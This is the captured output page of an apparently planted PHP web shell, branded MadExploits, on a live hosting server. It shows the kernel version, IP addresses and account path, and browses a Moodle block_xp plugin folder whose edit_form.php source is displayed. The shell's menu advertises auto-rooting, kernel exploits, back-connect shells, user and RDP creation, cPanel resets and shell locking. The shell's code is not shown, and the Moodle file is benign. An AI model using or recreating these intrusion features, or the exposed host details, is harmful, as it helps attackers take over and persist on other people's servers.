Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.127.69
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
blocks /
xp /
[ HOME SHELL ]
Name
Size
Permission
Action
.vscode
[ DIR ]
drwxr-xr-x
amd
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
ui
[ DIR ]
drwxr-xr-x
yui
[ DIR ]
drwxr-xr-x
.eslintrc
322
B
-rw-r--r--
.gitattributes
44
B
-rw-r--r--
.gitignore
39
B
-rw-r--r--
.travis.yml
3.29
KB
-rw-r--r--
CHANGELOG.md
11.21
KB
-rw-r--r--
README.md
3.24
KB
-rw-r--r--
ajax.php
1.2
KB
-rw-r--r--
block_xp.php
1.71
KB
-rw-r--r--
composer.json
502
B
-rw-r--r--
edit_form.php
1.67
KB
-rw-r--r--
gulpfile.js
2.83
KB
-rw-r--r--
index.php
1.45
KB
-rw-r--r--
lib.php
1.59
KB
-rw-r--r--
package.json
1.07
KB
-rw-r--r--
postcss.config.js
186
B
-rw-r--r--
renderer.php
38.94
KB
-rw-r--r--
settings.php
1.16
KB
-rw-r--r--
styles.css
21.07
KB
-rw-r--r--
tailwind.config.js
1.85
KB
-rw-r--r--
tsconfig.json
1017
B
-rw-r--r--
version.php
1.06
KB
-rw-r--r--
webpack.common.js
855
B
-rw-r--r--
webpack.dev.js
152
B
-rw-r--r--
webpack.prod.js
201
B
-rw-r--r--
yarn.lock
178.5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit_form.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Block XP edit form. * * @package block_xp * @copyright 2014 Frédéric Massart * @author Frédéric Massart <fred@branchup.tech> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ defined('MOODLE_INTERNAL') || die(); // Moodle expects a certain class to be found here, so we have to workaround it like this. $class = \block_xp\di::get('block_edit_form_class'); if (!class_exists($class) || !is_subclass_of($class, 'block_edit_form')) { throw new coding_exception('Block edit form class does not pass validation, or does not exist.'); } class_alias($class, 'block_xp_block_edit_form_class'); /** * Block XP edit form class. * * Some code checker maybe expecting to find the class, so here it is... * * @package block_xp * @copyright 2017 Frédéric Massart * @author Frédéric Massart <fred@branchup.tech> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ class block_xp_edit_form extends block_xp_block_edit_form_class { }
Close